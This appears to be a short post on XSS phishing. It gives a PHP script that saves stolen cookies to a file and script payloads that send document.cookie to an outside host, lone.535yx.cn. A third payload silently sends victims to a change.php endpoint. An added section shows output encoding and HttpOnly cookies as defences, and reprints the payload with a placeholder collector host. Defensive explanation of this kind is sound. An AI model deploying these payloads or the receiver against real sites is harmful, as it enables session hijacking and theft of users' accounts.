XSS Phishing
Receiving code on the website
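<?php
// Receiver: saves the value of the "a" query parameter
// (the cookie string sent by the payload) to a file.
if (isset($_GET['a']))
{
    $content = $_GET['a'];
    file_put_contents('tmp/cookie.txt', $content);
} else {
    echo 'no date input';
}
?>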
Constructing the phishing code
<script>document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie</script>
<body onload = "document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie"></body>
<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>
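
The payloads above depend on two things: the page reflecting input without encoding, and the session cookie being readable through document.cookie. The following is an added example, not code from the original post, showing the unencoded template beside its encoded form and a model of what script can read once the session cookie is HttpOnly; the function names, cookie names and the collector.example host are constructed for illustration.

```javascript
// Added defensive example; all names and sample values are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for HTML element content or a quoted attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the comment is reflected verbatim, so markup in it becomes live.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Hardened: the same template with the untrusted value encoded on output.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Session cookie issued with HttpOnly so page script cannot read it.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Model of document.cookie: browsers leave out cookies set with HttpOnly.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((header) => header.split(';').map((part) => part.trim()))
    .filter((parts) => !parts.slice(1).some((attr) => attr.toLowerCase() === 'httponly'))
    .map((parts) => parts[0])
    .join('; ');
}

// Constructed input shaped like the payload above (placeholder collector host).
const samplePayload =
  "<script>document.location.href='http://collector.example/getcookie.php?a='+document.cookie</script>";
const sampleSetCookie = [
  sessionCookieHeader('PHPSESSID', 'abc123'), // constructed session id
  'theme=dark; Path=/',                       // non-sensitive, script-readable
];

console.log(renderCommentUnsafe(samplePayload)); // script tag survives intact
console.log(renderCommentSafe(samplePayload));   // rendered as inert text
console.log(scriptVisibleCookies(sampleSetCookie)); // session cookie absent
```

HttpOnly only keeps the cookie out of document.cookie; it does not stop injected script from navigating the browser, as the change.php payload does, so output encoding remains the primary control.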
